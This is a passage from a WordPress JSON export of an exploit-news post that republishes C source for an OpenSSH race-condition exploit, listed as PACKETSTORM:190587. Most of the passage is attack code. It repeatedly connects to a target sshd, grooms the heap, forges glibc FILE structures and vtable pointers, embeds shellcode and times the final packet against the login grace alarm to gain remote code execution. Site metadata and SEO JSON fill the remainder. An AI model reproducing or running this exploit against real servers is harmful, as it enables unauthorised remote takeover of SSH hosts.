\\n”, argv[0]);
exit (1);
}<\/p>\n const char *ip = argv[1];
int port = atoi (argv[2]);
double parsing_time = 0;
int success = 0;<\/p>\n
srand (time (NULL));<\/p>\n
\/\/ Attempt exploitation for each possible glibc base address
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf (“Attempting exploitation with glibc base: 0x%lx\\n”,
glibc_base);<\/p>\n
\/\/ The advisory mentions “~10,000 tries on average”
for (int attempt = 0; attempt < 20000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf (“Attempt %d of 20000\\n”, attempt);
}<\/p>\n
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, “Failed to establish connection, attempt
%d\\n”,
attempt);
continue;
}<\/p>\n
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, “SSH handshake failed, attempt %d\\n”,
attempt);
close (sock);
continue;
}<\/p>\n
prepare_heap (sock);
time_final_packet (sock, &parsing_time);<\/p>\n
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf (“Possible exploitation success on attempt %d with
glibc “
“base 0x%lx!\\n”,
attempt, glibc_base);
success = 1;
break;
}<\/p>\n
close (sock);
usleep (100000); \/\/ 100ms delay between attempts, as mentioned in
the
\/\/ advisory
}
}<\/p>\n
return !success;
}<\/p>\n
int
setup_connection (const char *ip, int port)
{
int sock = socket (AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
perror (“socket”);
return -1;
}<\/p>\n
struct sockaddr_in server_addr;
memset (&server_addr, 0, sizeof (server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
{
perror (“inet_pton”);
close (sock);
return -1;
}<\/p>\n
if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
< 0)
{
perror (“connect”);
close (sock);
return -1;
}<\/p>\n
\/\/ Set socket to non-blocking mode
int flags = fcntl (sock, F_GETFL, 0);
fcntl (sock, F_SETFL, flags | O_NONBLOCK);<\/p>\n
return sock;
}<\/p>\n
void
send_packet (int sock, unsigned char packet_type, const unsigned char *data,
size_t len)
{
unsigned char packet[MAX_PACKET_SIZE];
size_t packet_len = len + 5;<\/p>\n
packet[0] = (packet_len >> 24) & 0xFF;
packet[1] = (packet_len >> 16) & 0xFF;
packet[2] = (packet_len >> 8) & 0xFF;
packet[3] = packet_len & 0xFF;
packet[4] = packet_type;<\/p>\n
memcpy (packet + 5, data, len);<\/p>\n
if (send (sock, packet, packet_len, 0) < 0)
{
perror (“send_packet”);
}
}<\/p>\n
void
send_ssh_version (int sock)
{
const char *ssh_version = “SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\\r\\n”;
if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
{
perror (“send ssh version”);
}
}<\/p>\n
int
receive_ssh_version (int sock)
{
char buffer[256];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer) – 1, 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));\n\n if (received > 0)
{
buffer[received] = ‘\\0’;
printf (“Received SSH version: %s”, buffer);
return 0;
}
else if (received == 0)
{
fprintf (stderr, “Connection closed while receiving SSH version\\n”);
}
else
{
perror (“receive ssh version”);
}
return -1;
}<\/p>\n
void
send_kex_init (int sock)
{
unsigned char kexinit_payload[36] = { 0 };
send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
}<\/p>\n
int
receive_kex_init (int sock)
{
unsigned char buffer[1024];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));\n\n if (received > 0)
{
printf (“Received KEX_INIT (%zd bytes)\\n”, received);
return 0;
}
else if (received == 0)
{
fprintf (stderr, “Connection closed while receiving KEX_INIT\\n”);
}
else
{
perror (“receive kex init”);
}
return -1;
}<\/p>\n
int
perform_ssh_handshake (int sock)
{
send_ssh_version (sock);
if (receive_ssh_version (sock) < 0)
return -1;
send_kex_init (sock);
if (receive_kex_init (sock) < 0)
return -1;
return 0;
}<\/p>\n
void
prepare_heap (int sock)
{
\/\/ Packet a: Allocate and free tcache chunks
for (int i = 0; i < 10; i++)
{
unsigned char tcache_chunk[64];
memset (tcache_chunk, ‘A’, sizeof (tcache_chunk));
send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
\/\/ These will be freed by the server, populating tcache
}<\/p>\n
\/\/ Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
for (int i = 0; i < 27; i++)
{
\/\/ Allocate large chunk (~8KB)
unsigned char large_hole[8192];
memset (large_hole, ‘B’, sizeof (large_hole));
send_packet (sock, 5, large_hole, sizeof (large_hole));<\/p>\n
\/\/ Allocate small chunk (320B)
unsigned char small_hole[320];
memset (small_hole, ‘C’, sizeof (small_hole));
send_packet (sock, 5, small_hole, sizeof (small_hole));
}<\/p>\n
\/\/ Packet c: Write fake headers, footers, vtable and _codecvt pointers
for (int i = 0; i < 27; i++)
{
unsigned char fake_data[4096];
create_fake_file_structure (fake_data, sizeof (fake_data),
GLIBC_BASES[0]);
send_packet (sock, 5, fake_data, sizeof (fake_data));
}<\/p>\n
\/\/ Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
unsigned char large_string[MAX_PACKET_SIZE – 1];
memset (large_string, ‘E’, sizeof (large_string));
send_packet (sock, 5, large_string, sizeof (large_string));
}<\/p>\n
void
create_fake_file_structure (unsigned char *data, size_t size,
uint64_t glibc_base)
{
memset (data, 0, size);<\/p>\n
struct
{
void *_IO_read_ptr;
void *_IO_read_end;
void *_IO_read_base;
void *_IO_write_base;
void *_IO_write_ptr;
void *_IO_write_end;
void *_IO_buf_base;
void *_IO_buf_end;
void *_IO_save_base;
void *_IO_backup_base;
void *_IO_save_end;
void *_markers;
void *_chain;
int _fileno;
int _flags;
int _mode;
char _unused2[40];
void *_vtable_offset;
} *fake_file = (void *)data;<\/p>\n
\/\/ Set _vtable_offset to 0x61 as described in the advisory
fake_file->_vtable_offset = (void *)0x61;<\/p>\n
\/\/ Set up fake vtable and _codecvt pointers
*(uint64_t *)(data + size – 16)
= glibc_base + 0x21b740; \/\/ fake vtable (_IO_wfile_jumps)
*(uint64_t *)(data + size – 8) = glibc_base + 0x21d7f8; \/\/ fake _codecvt
}<\/p>\n
void
time_final_packet (int sock, double *parsing_time)
{
double time_before = measure_response_time (sock, 1);
double time_after = measure_response_time (sock, 2);
*parsing_time = time_after – time_before;<\/p>\n
printf (“Estimated parsing time: %.6f seconds\\n”, *parsing_time);
}<\/p>\n
double
measure_response_time (int sock, int error_type)
{
unsigned char error_packet[1024];
size_t packet_size;<\/p>\n
if (error_type == 1)
{
\/\/ Error before sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
“ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3”);
}
else
{
\/\/ Error after sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
“ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9”);
}<\/p>\n
struct timespec start, end;
clock_gettime (CLOCK_MONOTONIC, &start);<\/p>\n
send_packet (sock, 50, error_packet,
packet_size); \/\/ SSH_MSG_USERAUTH_REQUEST<\/p>\n
char response[1024];
ssize_t received;
do
{
received = recv (sock, response, sizeof (response), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));\n\n clock_gettime (CLOCK_MONOTONIC, &end);\n\n double elapsed
= (end.tv_sec – start.tv_sec) + (end.tv_nsec – start.tv_nsec) \/ 1e9;
return elapsed;
}<\/p>\n
void
create_public_key_packet (unsigned char *packet, size_t size,
uint64_t glibc_base)
{
memset (packet, 0, size);<\/p>\n
size_t offset = 0;
for (int i = 0; i < 27; i++)
{
\/\/ malloc(~4KB) – This is for the large hole
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
offset += CHUNK_ALIGN (4096);<\/p>\n
\/\/ malloc(304) – This is for the small hole (potential FILE structure)
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
offset += CHUNK_ALIGN (304);
}<\/p>\n
\/\/ Add necessary headers for the SSH public key format
memcpy (packet, “ssh-rsa “, 8);<\/p>\n
\/\/ Place shellcode in the heap via previous allocations
memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13,
shellcode,
sizeof (shellcode));<\/p>\n
\/\/ Set up the fake FILE structures within the packet
for (int i = 0; i < 27; i++)
{
create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
+ CHUNK_ALIGN (304) * i,
CHUNK_ALIGN (304), glibc_base);
}
}<\/p>\n
int
attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
{
unsigned char final_packet[MAX_PACKET_SIZE];
create_public_key_packet (final_packet, sizeof (final_packet),
glibc_base);<\/p>\n
\/\/ Send all but the last byte
if (send (sock, final_packet, sizeof (final_packet) – 1, 0) < 0)
{
perror (“send final packet”);
return 0;
}<\/p>\n
\/\/ Precise timing for last byte
struct timespec start, current;
clock_gettime (CLOCK_MONOTONIC, &start);<\/p>\n
while (1)
{
clock_gettime (CLOCK_MONOTONIC, ¤t);
double elapsed = (current.tv_sec – start.tv_sec)
+ (current.tv_nsec – start.tv_nsec) \/ 1e9;
if (elapsed >= (LOGIN_GRACE_TIME – parsing_time – 0.001))
{ \/\/ 1ms before SIGALRM
if (send (sock, &final_packet[sizeof (final_packet) – 1], 1, 0) <
0)
{
perror (“send last byte”);
return 0;
}
break;
}
}<\/p>\n
\/\/ Check for successful exploitation
char response[1024];
ssize_t received = recv (sock, response, sizeof (response), 0);
if (received > 0)
{
printf (“Received response after exploit attempt (%zd bytes)\\n”,
received);
\/\/ Analyze response to determine if we hit the “large” race window
if (memcmp (response, “SSH-2.0-“, 8) != 0)
{
printf (“Possible hit on ‘large’ race window\\n”);
return 1;
}
}
else if (received == 0)
{
printf (
“Connection closed by server – possible successful
exploitation\\n”);
return 1;
}
else if (errno == EWOULDBLOCK || errno == EAGAIN)
{
printf (“No immediate response from server – possible successful “
“exploitation\\n”);
return 1;
}
else
{
perror (“recv”);
}
return 0;
}<\/p>\n
int
perform_exploit (const char *ip, int port)
{
int success = 0;
double parsing_time = 0;
double timing_adjustment = 0;<\/p>\n
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf (“Attempting exploitation with glibc base: 0x%lx\\n”,
glibc_base);<\/p>\n
for (int attempt = 0; attempt < 10000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf (“Attempt %d of 10000\\n”, attempt);
}<\/p>\n
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, “Failed to establish connection, attempt
%d\\n”,
attempt);
continue;
}<\/p>\n
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, “SSH handshake failed, attempt %d\\n”,
attempt);
close (sock);
continue;
}<\/p>\n
prepare_heap (sock);
time_final_packet (sock, &parsing_time);<\/p>\n
\/\/ Implement feedback-based timing strategy
parsing_time += timing_adjustment;<\/p>\n
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf (“Possible exploitation success on attempt %d with
glibc “
“base 0x%lx!\\n”,
attempt, glibc_base);
success = 1;
\/\/ In a real exploit, we would now attempt to interact with
the
\/\/ shell
}
else
{
\/\/ Adjust timing based on feedback
timing_adjustment += 0.00001; \/\/ Small incremental adjustment
}<\/p>\n
close (sock);
usleep (100000); \/\/ 100ms delay between attempts, as mentioned in
the
\/\/ advisory
}
}<\/p>\n
return success;
}\n<\/div>\n
View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title OpenSSH 9.8p1 Race Condition Exploit ID PACKETSTORM:190587 Type packetstorm Published 2025-04-22T00:00:00 Modified 2025-04-22T00:00:00 CVSS Information CVSS Score 8.1 Severity…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,15,13,53,7,11,5],"class_list":["post-958","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
OpenSSH 9.8p1 Race Condition - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=958\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"OpenSSH 9.8p1 Race Condition - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title OpenSSH 9.8p1 Race Condition Exploit ID PACKETSTORM:190587 Type packetstorm Published 2025-04-22T00:00:00 Modified 2025-04-22T00:00:00 CVSS Information CVSS Score 8.1 Severity...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=958\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T06:01:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"OpenSSH 9.8p1 Race Condition\",\"datePublished\":\"2025-04-23T06:01:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958\"},\"wordCount\":1734,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.1\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=958#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958\",\"name\":\"OpenSSH 9.8p1 Race Condition - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-23T06:01:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=958\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=958#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"OpenSSH 9.8p1 Race Condition\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"OpenSSH 9.8p1 Race Condition - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=958","og_locale":"en_US","og_type":"article","og_title":"OpenSSH 9.8p1 Race Condition - zero redgem","og_description":"Exploit Details Basic Information Exploit Title OpenSSH 9.8p1 Race Condition Exploit ID PACKETSTORM:190587 Type packetstorm Published 2025-04-22T00:00:00 Modified 2025-04-22T00:00:00 CVSS Information CVSS Score 8.1 Severity...","og_url":"https:\/\/zero.redgem.net\/?p=958","og_site_name":"zero redgem","article_published_time":"2025-04-23T06:01:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=958#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=958"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"OpenSSH 9.8p1 Race Condition","datePublished":"2025-04-23T06:01:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=958"},"wordCount":1734,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.1","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=958#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=958","url":"https:\/\/zero.redgem.net\/?p=958","name":"OpenSSH 9.8p1 Race Condition - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-23T06:01:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=958#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=958"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=958#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"OpenSSH 9.8p1 Race Condition"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/958","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=958"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/958\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}